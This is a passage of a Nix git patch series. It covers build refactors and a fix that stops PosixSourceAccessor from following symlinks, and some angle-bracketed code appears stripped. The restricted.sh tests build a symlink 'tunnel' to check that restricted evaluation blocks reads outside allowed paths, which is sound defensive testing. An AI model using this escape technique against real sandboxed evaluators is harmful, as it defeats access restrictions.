interfaces are internal and unstable. -AC_ARG_ENABLE(internal_api_docs, AS_HELP_STRING([--enable-internal-api-docs],[Build API docs for Nix's internal unstable C++ interfaces]), - internal_api_docs=$enableval, internal_api_docs=no) -AC_SUBST(internal_api_docs) - # LTO is currently broken with clang for unknown reasons; ld segfaults in the llvm plugin AC_ARG_ENABLE(lto, AS_HELP_STRING([--enable-lto],[Enable LTO (only supported with GCC) [default=no]]), lto=$enableval, lto=no) @@ -310,8 +316,7 @@ if test "$gc" = yes; then AC_DEFINE(HAVE_BOEHMGC, 1, [Whether to use the Boehm garbage collector.]) fi - -if test "$ENABLE_TESTS" = yes; then +AS_IF([test "$ENABLE_TESTS" == "yes"],[ # Look for gtest. 
PKG_CHECK_MODULES([GTEST], [gtest_main]) @@ -338,12 +343,11 @@ AC_LINK_IFELSE([ [AC_MSG_ERROR([librapidcheck is not found.])]) AC_LANG_POP(C++) -fi +]) # Look for nlohmann/json. PKG_CHECK_MODULES([NLOHMANN_JSON], [nlohmann_json >= 3.9]) - # documentation generation switch AC_ARG_ENABLE(doc-gen, AS_HELP_STRING([--disable-doc-gen],[disable documentation generation]), doc_generate=$enableval, doc_generate=yes) @@ -388,6 +392,8 @@ if test "$embedded_sandbox_shell" = yes; then AC_DEFINE(HAVE_EMBEDDED_SANDBOX_SHELL, 1, [Include the sandbox shell in the Nix binary.]) fi +]) + # Expand all variables in config.status. test "$prefix" = NONE && prefix=$ac_default_prefix From 7a7ad7c84b4dd37331a8f8889b02c94540522dbc Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:14:36 -0500 Subject: [PATCH 036/654] Remove uneeded file --- test-nix-versions.nix | 15 --------------- 1 file changed, 15 deletions(-) delete mode 100644 test-nix-versions.nix diff --git a/test-nix-versions.nix b/test-nix-versions.nix deleted file mode 100644 index bda4621a1..000000000 --- a/test-nix-versions.nix +++ /dev/null @@ -1,15 +0,0 @@ -{ lib -, fileset -, stdenv -, client -, daemon -}: - -stdenv.mkDerivation { - name = - "nix-tests" - + lib.optionalString - (lib.versionAtLeast daemon.version "2.4pre20211005" && - lib.versionAtLeast client.version "2.4pre20211005") - "-${client.version}-against-${daemon.version}"; -} From e275f0adfb6b3f360f10f5adcf140c17edc58cc6 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:16:07 -0500 Subject: [PATCH 037/654] Move `binary-tarball.nix` to scripts dir --- flake.nix | 2 +- binary-tarball.nix => scripts/binary-tarball.nix | 10 +++++----- 2 files changed, 6 insertions(+), 6 deletions(-) rename binary-tarball.nix => scripts/binary-tarball.nix (85%) diff --git a/flake.nix b/flake.nix index fab8c45be..5c6ad3bc7 100644 --- a/flake.nix +++ b/flake.nix @@ -139,7 +139,7 @@ doBuild = false; }; - binaryTarball = nix: pkgs: pkgs.callPackage 
./binary-tarball.nix { + binaryTarball = nix: pkgs: pkgs.callPackage ./scripts/binary-tarball.nix { inherit nix; }; diff --git a/binary-tarball.nix b/scripts/binary-tarball.nix similarity index 85% rename from binary-tarball.nix rename to scripts/binary-tarball.nix index 0053abbca..32e811c94 100644 --- a/binary-tarball.nix +++ b/scripts/binary-tarball.nix @@ -21,18 +21,18 @@ in runCommand "nix-binary-tarball-${version}" env '' cp ${installerClosureInfo}/registration $TMPDIR/reginfo - cp ${./scripts/create-darwin-volume.sh} $TMPDIR/create-darwin-volume.sh - substitute ${./scripts/install-nix-from-closure.sh} $TMPDIR/install \ + cp ${./create-darwin-volume.sh} $TMPDIR/create-darwin-volume.sh + substitute ${./install-nix-from-closure.sh} $TMPDIR/install \ --subst-var-by nix ${nix} \ --subst-var-by cacert ${cacert} - substitute ${./scripts/install-darwin-multi-user.sh} $TMPDIR/install-darwin-multi-user.sh \ + substitute ${./install-darwin-multi-user.sh} $TMPDIR/install-darwin-multi-user.sh \ --subst-var-by nix ${nix} \ --subst-var-by cacert ${cacert} - substitute ${./scripts/install-systemd-multi-user.sh} $TMPDIR/install-systemd-multi-user.sh \ + substitute ${./install-systemd-multi-user.sh} $TMPDIR/install-systemd-multi-user.sh \ --subst-var-by nix ${nix} \ --subst-var-by cacert ${cacert} - substitute ${./scripts/install-multi-user.sh} $TMPDIR/install-multi-user \ + substitute ${./install-multi-user.sh} $TMPDIR/install-multi-user \ --subst-var-by nix ${nix} \ --subst-var-by cacert ${cacert} From 60fe4ddaa1801b37a044a2c96071d96739bd26c0 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:17:47 -0500 Subject: [PATCH 038/654] Expose `boehmgc-nix` in overlay --- flake.nix | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/flake.nix b/flake.nix index 5c6ad3bc7..78fc88bed 100644 --- a/flake.nix +++ b/flake.nix @@ -188,6 +188,17 @@ ++ [ "-DUSE_SSH=exec" ]; }); + boehmgc-nix = (final.boehmgc.override { + 
enableLargeConfig = true; + }).overrideAttrs(o: { + patches = (o.patches or []) ++ [ + ./boehmgc-coroutine-sp-fallback.diff + + # https://github.com/ivmai/bdwgc/pull/586 + ./boehmgc-traceable_allocator-public.diff + ]; + }); + nix = let officialRelease = false; @@ -196,25 +207,14 @@ then "" else "pre${builtins.substring 0 8 (self.lastModifiedDate or self.lastModified or "19700101")}_${self.shortRev or "dirty"}"; - boehmgc = (final.boehmgc.override { - enableLargeConfig = true; - }).overrideAttrs(o: { - patches = (o.patches or []) ++ [ - ./boehmgc-coroutine-sp-fallback.diff - - # https://github.com/ivmai/bdwgc/pull/586 - ./boehmgc-traceable_allocator-public.diff - ]; - }); - in final.callPackage ./package.nix { inherit - boehmgc fileset stdenv versionSuffix ; officialRelease = false; + boehmgc = final.boehmgc-nix; libgit2 = final.libgit2-nix; lowdown = final.lowdown-nix; busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; From 77003a4f0c380929f18b71476b9e7f9cd4009458 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:29:15 -0500 Subject: [PATCH 039/654] Factor out the installer script --- flake.nix | 43 +++++++++++-------------------------------- scripts/installer.nix | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 46 insertions(+), 32 deletions(-) create mode 100644 scripts/installer.nix diff --git a/flake.nix b/flake.nix index 78fc88bed..ecd0381a2 100644 --- a/flake.nix +++ b/flake.nix @@ -89,38 +89,17 @@ }); installScriptFor = systems: - with nixpkgsFor.x86_64-linux.native; - runCommand "installer-script" - { buildInputs = [ nix ]; - } - '' - mkdir -p $out/nix-support - - # Converts /nix/store/50p3qk8k...-nix-2.4pre20201102_550e11f/bin/nix to 50p3qk8k.../bin/nix. 
- tarballPath() { - # Remove the store prefix - local path=''${1#${builtins.storeDir}/} - # Get the path relative to the derivation root - local rest=''${path#*/} - # Get the derivation hash - local drvHash=''${path%%-*} - echo "$drvHash/$rest" - } - - substitute ${./scripts/install.in} $out/install \ - ${pkgs.lib.concatMapStrings - (system: let - tarball = if builtins.elem system crossSystems then self.hydraJobs.binaryTarballCross.x86_64-linux.${system} else self.hydraJobs.binaryTarball.${system}; - in '' \ - --replace '@tarballHash_${system}@' $(nix --experimental-features nix-command hash-file --base16 --type sha256 ${tarball}/*.tar.xz) \ - --replace '@tarballPath_${system}@' $(tarballPath ${tarball}/*.tar.xz) \ - '' - ) - systems - } --replace '@nixVersion@' ${version} - - echo "file installer $out/install" >> $out/nix-support/hydra-build-products - ''; + nixpkgsFor.x86_64-linux.native.callPackage ./scripts/installer.nix { + systemTarballPairs = map + (system: { + inherit system; + tarball = + if builtins.elem system crossSystems + then self.hydraJobs.binaryTarballCross.x86_64-linux.${system} + else self.hydraJobs.binaryTarball.${system}; + }) + systems; + }; testNixVersions = pkgs: client: daemon: pkgs.callPackage ./package.nix { diff --git a/scripts/installer.nix b/scripts/installer.nix new file mode 100644 index 000000000..35d2d7fe6 --- /dev/null +++ b/scripts/installer.nix @@ -0,0 +1,35 @@ +{ lib +, runCommand +, nix +, systemTarballPairs +}: + +runCommand "installer-script" { + buildInputs = [ nix ]; +} '' + mkdir -p $out/nix-support + + # Converts /nix/store/50p3qk8k...-nix-2.4pre20201102_550e11f/bin/nix to 50p3qk8k.../bin/nix. 
+ tarballPath() { + # Remove the store prefix + local path=''${1#${builtins.storeDir}/} + # Get the path relative to the derivation root + local rest=''${path#*/} + # Get the derivation hash + local drvHash=''${path%%-*} + echo "$drvHash/$rest" + } + + substitute ${./install.in} $out/install \ + ${lib.concatMapStrings + ({ system, tarball }: + '' \ + --replace '@tarballHash_${system}@' $(nix --experimental-features nix-command hash-file --base16 --type sha256 ${tarball}/*.tar.xz) \ + --replace '@tarballPath_${system}@' $(tarballPath ${tarball}/*.tar.xz) \ + '' + ) + systemTarballPairs + } --replace '@nixVersion@' ${nix.version} + + echo "file installer $out/install" >> $out/nix-support/hydra-build-products +'' From f58615518c1284d4dbe4655246d4d5d6e9b2befe Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:39:33 -0500 Subject: [PATCH 040/654] Add documenting comments to `package.nix` --- package.nix | 22 +++++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) diff --git a/package.nix b/package.nix index 0758f989e..7f0d78b5c 100644 --- a/package.nix +++ b/package.nix @@ -43,22 +43,37 @@ #: # This probably seems like too many degrees of freedom, but it # faithfully reflects how the underlying configure + make build system -# work. The top-level flake.nix will choose useful combinations. +# work. The top-level flake.nix will choose useful combinations of these +# options to CI. , pname ? "nix" , versionSuffix ? "" , officialRelease ? false +# Whether to build Nix. Useful to skip for tasks like (a) just +# generating API docs or (b) testing existing pre-built versions of Nix , doBuild ? true + +# Run the unit tests as part of the build. See `installUnitTests` for an +# alternative to this. , doCheck ? __forDefaults.canRunInstalled + +# Run the functional tests as part of the build. , doInstallCheck ? test-client != null || __forDefaults.canRunInstalled +# Check test coverage of Nix. 
Probably want to use with with at least +# one of `doCHeck` or `doInstallCheck` enabled. , withCoverageChecks ? false # Whether to build the regular manual , enableManual ? __forDefaults.canRunInstalled + +# Whether to compile `rl-next.md`, the release notes for the next +# not-yet-released version of Nix in the manul, from the individual +# change log entries in the directory. , buildUnreleasedNotes ? false + # Whether to build the internal API docs, can be done separately from # everything else. , enableInternalAPIDocs ? false @@ -350,8 +365,13 @@ in { platforms = lib.platforms.unix; mainProgram = "nix"; broken = !(lib.all (a: a) [ + # We cannot run or install unit tests if we don't build them or + # Nix proper (which they depend on). (installUnitTests -> doBuild) (doCheck -> doBuild) + # We have to build the manual to build unreleased notes, as those + # are part of the manual + (buildUnreleasedNotes -> enableManual) ]); }; From a5a45e64e18de3eb827ca83c7356dc8a088be125 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:45:15 -0500 Subject: [PATCH 041/654] Don't expose file sets anymore --- package.nix | 2 -- 1 file changed, 2 deletions(-) diff --git a/package.nix b/package.nix index 7f0d78b5c..52050496c 100644 --- a/package.nix +++ b/package.nix @@ -354,8 +354,6 @@ in { hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; passthru = { - inherit filesets; - perl-bindings = callPackage ./perl { inherit fileset stdenv; }; From 7e2b1cce6abec48f85c8bc056da0ca991dfe7b32 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:47:54 -0500 Subject: [PATCH 042/654] Slap on `perl-bindings` in the caller The Perl bindings are not part of Nix, but a downstream package, so they don't belong in `package.nix`. They don't really belong as an attribute on `nix` either, but we can just leave that interface as is for now. 
--- flake.nix | 9 +++++++++ package.nix | 7 ------- 2 files changed, 9 insertions(+), 7 deletions(-) diff --git a/flake.nix b/flake.nix index ecd0381a2..c92f717d5 100644 --- a/flake.nix +++ b/flake.nix @@ -197,7 +197,16 @@ libgit2 = final.libgit2-nix; lowdown = final.lowdown-nix; busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; + } // { + # this is a proper separate downstream package, but put + # here also for back compat reasons. + perl-bindings = final.nix-perl-bindings; }; + + nix-perl-bindings = final.callPackage ./perl { + inherit fileset stdenv; + }; + }; in { diff --git a/package.nix b/package.nix index 52050496c..f6219e58a 100644 --- a/package.nix +++ b/package.nix @@ -1,5 +1,4 @@ { lib -, callPackage , stdenv , releaseTools , autoconf-archive @@ -353,12 +352,6 @@ in { hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; - passthru = { - perl-bindings = callPackage ./perl { - inherit fileset stdenv; - }; - }; - meta = { platforms = lib.platforms.unix; mainProgram = "nix"; From 6e0656c66c1052bcbab204140c6b3dec81f3ab15 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:53:05 -0500 Subject: [PATCH 043/654] Add another configure flag assertion --- package.nix | 3 +++ 1 file changed, 3 insertions(+) diff --git a/package.nix b/package.nix index f6219e58a..42f98a48c 100644 --- a/package.nix +++ b/package.nix @@ -363,6 +363,9 @@ in { # We have to build the manual to build unreleased notes, as those # are part of the manual (buildUnreleasedNotes -> enableManual) + # The build process for the manual currently requires extracting + # data from the Nix executable we are trying to document. 
+ (enableManual -> doBuild) ]); }; From 14c26d642ebcff3fe45c8eb6719a213c63143fb3 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:57:16 -0500 Subject: [PATCH 044/654] Clean up two comments --- package.nix | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package.nix b/package.nix index 42f98a48c..96b9111f8 100644 --- a/package.nix +++ b/package.nix @@ -329,10 +329,10 @@ in { doInstallCheck = attrs.doInstallCheck; installCheckFlags = "sysconfdir=$(out)/etc"; - # work around buggy detection in stdenv + # Work around buggy detection in stdenv. installCheckTarget = "installcheck"; - # work around weird bug where it doesn't want to do anything + # Work around weird bug where it doesn't think there is a Makefile. installCheckPhase = if (!doBuild && doInstallCheck) then '' mkdir -p src/nix-channel make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES From 345f79d01676680f2d4ef8803790896a190c855b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 5 Dec 2023 15:14:28 +0100 Subject: [PATCH 045/654] Check that we can't follow symlinks outside of the allowed paths --- tests/functional/restricted.sh | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/tests/functional/restricted.sh b/tests/functional/restricted.sh index b8deceacc..cb83c34b1 100644 --- a/tests/functional/restricted.sh +++ b/tests/functional/restricted.sh @@ -39,6 +39,15 @@ nix-instantiate --eval --restrict-eval $TEST_ROOT/restricted.nix -I $TEST_ROOT - [[ $(nix eval --raw --impure --restrict-eval -I . --expr 'builtins.readFile "${import ./simple.nix}/hello"') == 'Hello World!' ]] +# Check that we can't follow a symlink outside of the allowed paths. +mkdir -p $TEST_ROOT/tunnel.d +ln -sfn .. 
$TEST_ROOT/tunnel.d/tunnel +echo foo > $TEST_ROOT/bar + +expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readFile " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" + +expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readDir " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" + # Check whether we can leak symlink information through directory traversal. traverseDir="$(pwd)/restricted-traverse-me" ln -sfn "$(pwd)/restricted-secret" "$(pwd)/restricted-innocent" From 733333e87db391e4f832de65f0f49f60e50c45a4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 1 Dec 2023 17:38:34 -0500 Subject: [PATCH 046/654] Including `config.h` also needs `$(buildprefix)` Per the instruction in the manual, we want to run configure in a different directory so that we can configure + build for multiple platforms. That means `config.h` will be in the build directory. This is just like `Makefile.config`, which already is used with `$(buildprefix)`. --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index eea297c89..41f14ac92 100644 --- a/Makefile +++ b/Makefile @@ -64,4 +64,4 @@ $(eval $(call include-sub-makefile, doc/manual/local.mk)) $(eval $(call include-sub-makefile, doc/internal-api/local.mk)) endif -GLOBAL_CXXFLAGS += -g -Wall -include config.h -std=c++2a -I src +GLOBAL_CXXFLAGS += -g -Wall -include $(buildprefix)config.h -std=c++2a -I src From 83c067c0fa0cc5a2dca440e5c986afe40b163802 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Tue, 5 Dec 2023 23:02:59 +0100 Subject: [PATCH 047/654] PosixSourceAccessor: Don't follow any symlinks All path components must not be symlinks now (so the user needs to call `resolveSymlinks()` when needed). 
--- src/libexpr/parser.y | 11 +++++----- src/libexpr/primops.cc | 30 ++++++++++++++-------------- src/libutil/posix-source-accessor.cc | 27 +++++++++++++++++++++---- src/libutil/posix-source-accessor.hh | 5 +++++ src/nix-env/nix-env.cc | 6 +++--- src/nix-env/user-env.cc | 2 +- tests/functional/restricted.sh | 7 +++++-- 7 files changed, 58 insertions(+), 30 deletions(-) diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 58fc580fc..16ad8af2e 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -692,16 +692,17 @@ SourcePath resolveExprPath(SourcePath path) /* If `path' is a symlink, follow it. This is so that relative path references work. */ - while (true) { + while (!path.path.isRoot()) { // Basic cycle/depth limit to avoid infinite loops. if (++followCount >= maxFollow) throw Error("too many symbolic links encountered while traversing the path '%s'", path); - if (path.lstat().type != InputAccessor::tSymlink) break; - path = {path.accessor, CanonPath(path.readLink(), path.path.parent().value_or(CanonPath::root))}; + auto p = path.parent().resolveSymlinks() + path.baseName(); + if (p.lstat().type != InputAccessor::tSymlink) break; + path = {path.accessor, CanonPath(p.readLink(), path.path.parent().value_or(CanonPath::root))}; } /* If `path' refers to a directory, append `/default.nix'. 
*/ - if (path.lstat().type == InputAccessor::tDirectory) + if (path.resolveSymlinks().lstat().type == InputAccessor::tDirectory) return path + "default.nix"; return path; @@ -716,7 +717,7 @@ Expr * EvalState::parseExprFromFile(const SourcePath & path) Expr * EvalState::parseExprFromFile(const SourcePath & path, std::shared_ptr & staticEnv) { - auto buffer = path.readFile(); + auto buffer = path.resolveSymlinks().readFile(); // readFile hopefully have left some extra space for terminators buffer.append("\0\0", 2); return parse(buffer.data(), buffer.size(), Pos::Origin(path), path.parent(), staticEnv); diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index c442de986..f2d51f8f5 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -110,7 +110,7 @@ StringMap EvalState::realiseContext(const NixStringContext & context) return res; } -static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v) +static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, bool resolveSymlinks = true) { NixStringContext context; @@ -120,9 +120,9 @@ static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v) if (!context.empty() && path.accessor == state.rootFS) { auto rewrites = state.realiseContext(context); auto realPath = state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context); - return {path.accessor, CanonPath(realPath)}; - } else - return path; + path = {path.accessor, CanonPath(realPath)}; + } + return resolveSymlinks ? path.resolveSymlinks() : path; } catch (Error & e) { e.addTrace(state.positions[pos], "while realising the context of path '%s'", path); throw; @@ -162,7 +162,7 @@ static void mkOutputString( argument. 
*/ static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * vScope, Value & v) { - auto path = realisePath(state, pos, vPath); + auto path = realisePath(state, pos, vPath, false); auto path2 = path.path.abs(); // FIXME @@ -1525,16 +1525,16 @@ static RegisterPrimOp primop_storePath({ static void prim_pathExists(EvalState & state, const PosIdx pos, Value * * args, Value & v) { - auto & arg = *args[0]; - - auto path = realisePath(state, pos, arg); - - /* SourcePath doesn't know about trailing slash. */ - auto mustBeDir = arg.type() == nString - && (arg.string_view().ends_with("/") - || arg.string_view().ends_with("/.")); - try { + auto & arg = *args[0]; + + auto path = realisePath(state, pos, arg); + + /* SourcePath doesn't know about trailing slash. */ + auto mustBeDir = arg.type() == nString + && (arg.string_view().ends_with("/") + || arg.string_view().ends_with("/.")); + auto st = path.maybeLstat(); auto exists = st && (!mustBeDir || st->type == SourceAccessor::tDirectory); v.mkBool(exists); @@ -1771,7 +1771,7 @@ static std::string_view fileTypeToString(InputAccessor::Type type) static void prim_readFileType(EvalState & state, const PosIdx pos, Value * * args, Value & v) { - auto path = realisePath(state, pos, *args[0]); + auto path = realisePath(state, pos, *args[0], false); /* Retrieve the directory entry type and stringize it. */ v.mkString(fileTypeToString(path.lstat().type)); } diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc index dc96f84e5..0601e6387 100644 --- a/src/libutil/posix-source-accessor.cc +++ b/src/libutil/posix-source-accessor.cc @@ -8,9 +8,9 @@ void PosixSourceAccessor::readFile( Sink & sink, std::function sizeCallback) { - // FIXME: add O_NOFOLLOW since symlinks should be resolved by the - // caller? 
- AutoCloseFD fd = open(path.c_str(), O_RDONLY | O_CLOEXEC); + assertNoSymlinks(path); + + AutoCloseFD fd = open(path.c_str(), O_RDONLY | O_CLOEXEC | O_NOFOLLOW); if (!fd) throw SysError("opening file '%1%'", path); @@ -42,14 +42,16 @@ void PosixSourceAccessor::readFile( bool PosixSourceAccessor::pathExists(const CanonPath & path) { + if (auto parent = path.parent()) assertNoSymlinks(*parent); return nix::pathExists(path.abs()); } std::optional PosixSourceAccessor::maybeLstat(const CanonPath & path) { + if (auto parent = path.parent()) assertNoSymlinks(*parent); struct stat st; if (::lstat(path.c_str(), &st)) { - if (errno == ENOENT) return std::nullopt; + if (errno == ENOENT || errno == ENOTDIR) return std::nullopt; throw SysError("getting status of '%s'", showPath(path)); } mtime = std::max(mtime, st.st_mtime); @@ -66,6 +68,7 @@ std::optional PosixSourceAccessor::maybeLstat(const CanonP SourceAccessor::DirEntries PosixSourceAccessor::readDirectory(const CanonPath & path) { + assertNoSymlinks(path); DirEntries res; for (auto & entry : nix::readDirectory(path.abs())) { std::optional type; @@ -81,6 +84,7 @@ SourceAccessor::DirEntries PosixSourceAccessor::readDirectory(const CanonPath & std::string PosixSourceAccessor::readLink(const CanonPath & path) { + if (auto parent = path.parent()) assertNoSymlinks(*parent); return nix::readLink(path.abs()); } @@ -89,4 +93,19 @@ std::optional PosixSourceAccessor::getPhysicalPath(const CanonPath & return path; } +void PosixSourceAccessor::assertNoSymlinks(CanonPath path) +{ + // FIXME: cache this since it potentially causes a lot of lstat calls. 
+ while (!path.isRoot()) { + struct stat st; + if (::lstat(path.c_str(), &st)) { + if (errno != ENOENT) + throw SysError("getting status of '%s'", showPath(path)); + } + if (S_ISLNK(st.st_mode)) + throw Error("path '%s' is a symlink", showPath(path)); + path.pop(); + } +} + } diff --git a/src/libutil/posix-source-accessor.hh b/src/libutil/posix-source-accessor.hh index a45d96bf8..7189a40e5 100644 --- a/src/libutil/posix-source-accessor.hh +++ b/src/libutil/posix-source-accessor.hh @@ -29,6 +29,11 @@ struct PosixSourceAccessor : virtual SourceAccessor std::string readLink(const CanonPath & path) override; std::optional getPhysicalPath(const CanonPath & path) override; + + /** + * Throw an error if `path` or any of its ancestors are symlinks. + */ + void assertNoSymlinks(CanonPath path); }; } diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc index 86126c7ad..e2bbd9775 100644 --- a/src/nix-env/nix-env.cc +++ b/src/nix-env/nix-env.cc @@ -97,7 +97,7 @@ static bool isNixExpr(const SourcePath & path, struct InputAccessor::Stat & st) { return st.type == InputAccessor::tRegular - || (st.type == InputAccessor::tDirectory && (path + "default.nix").pathExists()); + || (st.type == InputAccessor::tDirectory && (path + "default.nix").resolveSymlinks().pathExists()); } @@ -116,11 +116,11 @@ static void getAllExprs(EvalState & state, are implemented using profiles). 
*/ if (i == "manifest.nix") continue; - SourcePath path2 = path + i; + auto path2 = (path + i).resolveSymlinks(); InputAccessor::Stat st; try { - st = path2.resolveSymlinks().lstat(); + st = path2.lstat(); } catch (Error &) { continue; // ignore dangling symlinks in ~/.nix-defexpr } diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc index 250224e7d..34f6bd005 100644 --- a/src/nix-env/user-env.cc +++ b/src/nix-env/user-env.cc @@ -21,7 +21,7 @@ DrvInfos queryInstalled(EvalState & state, const Path & userEnv) auto manifestFile = userEnv + "/manifest.nix"; if (pathExists(manifestFile)) { Value v; - state.evalFile(state.rootPath(CanonPath(manifestFile)), v); + state.evalFile(state.rootPath(CanonPath(manifestFile)).resolveSymlinks(), v); Bindings & bindings(*state.allocBindings(0)); getDerivations(state, v, "", bindings, elems, false); } diff --git a/tests/functional/restricted.sh b/tests/functional/restricted.sh index cb83c34b1..2d6ab964b 100644 --- a/tests/functional/restricted.sh +++ b/tests/functional/restricted.sh @@ -40,13 +40,16 @@ nix-instantiate --eval --restrict-eval $TEST_ROOT/restricted.nix -I $TEST_ROOT - [[ $(nix eval --raw --impure --restrict-eval -I . --expr 'builtins.readFile "${import ./simple.nix}/hello"') == 'Hello World!' ]] # Check that we can't follow a symlink outside of the allowed paths. -mkdir -p $TEST_ROOT/tunnel.d +mkdir -p $TEST_ROOT/tunnel.d $TEST_ROOT/foo2 ln -sfn .. 
$TEST_ROOT/tunnel.d/tunnel echo foo > $TEST_ROOT/bar expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readFile " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" -expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readDir " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" +expectStderr 1 nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readDir " -I $TEST_ROOT/tunnel.d | grepQuiet "forbidden in restricted mode" + +# Reading the parents of allowed paths should show only the ancestors of the allowed paths. +[[ $(nix-instantiate --restrict-eval --eval -E "let __nixPath = [ { prefix = \"foo\"; path = $TEST_ROOT/tunnel.d; } ]; in builtins.readDir " -I $TEST_ROOT/tunnel.d) == '{ "tunnel.d" = "directory"; }' ]] # Check whether we can leak symlink information through directory traversal. traverseDir="$(pwd)/restricted-traverse-me" From b23273f6a29c725646b3523b1c35a0ae4a84ef61 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 5 Dec 2023 18:10:37 -0500 Subject: [PATCH 048/654] Add missing `-pthread` for test support libraries This is good in general (see how the other libraries also have long had it, since 49fe9592a47e7819179c2de4fd6068e897e944c7) but in particular needed to fix the NetBSD build. 
--- tests/unit/libexpr-support/local.mk | 2 +- tests/unit/libstore-support/local.mk | 2 +- tests/unit/libutil-support/local.mk | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/tests/unit/libexpr-support/local.mk b/tests/unit/libexpr-support/local.mk index 28e87b8f2..12a76206a 100644 --- a/tests/unit/libexpr-support/local.mk +++ b/tests/unit/libexpr-support/local.mk @@ -20,4 +20,4 @@ libexpr-test-support_LIBS = \ libstore-test-support libutil-test-support \ libexpr libstore libutil -libexpr-test-support_LDFLAGS := -lrapidcheck +libexpr-test-support_LDFLAGS := -pthread -lrapidcheck diff --git a/tests/unit/libstore-support/local.mk b/tests/unit/libstore-support/local.mk index d5d657c91..ff075c96a 100644 --- a/tests/unit/libstore-support/local.mk +++ b/tests/unit/libstore-support/local.mk @@ -18,4 +18,4 @@ libstore-test-support_LIBS = \ libutil-test-support \ libstore libutil -libstore-test-support_LDFLAGS := -lrapidcheck +libstore-test-support_LDFLAGS := -pthread -lrapidcheck diff --git a/tests/unit/libutil-support/local.mk b/tests/unit/libutil-support/local.mk index 43a1551e5..2ee2cdb6c 100644 --- a/tests/unit/libutil-support/local.mk +++ b/tests/unit/libutil-support/local.mk @@ -16,4 +16,4 @@ libutil-test-support_CXXFLAGS += $(libutil-tests_EXTRA_INCLUDES) libutil-test-support_LIBS = libutil -libutil-test-support_LDFLAGS := -lrapidcheck +libutil-test-support_LDFLAGS := -pthread -lrapidcheck From 504e4fc4576dc6a4cd5c083a3bf7b80dfb0ca220 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 6 Dec 2023 13:45:59 +0100 Subject: [PATCH 049/654] CanonPath: Support std::hash --- src/libfetchers/git-utils.cc | 2 +- src/libutil/canon-path.hh | 11 +++++++++++ 2 files changed, 12 insertions(+), 1 deletion(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 19eae0e1d..5f2a7a8bc 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -554,7 +554,7 @@ struct GitInputAccessor : InputAccessor return 
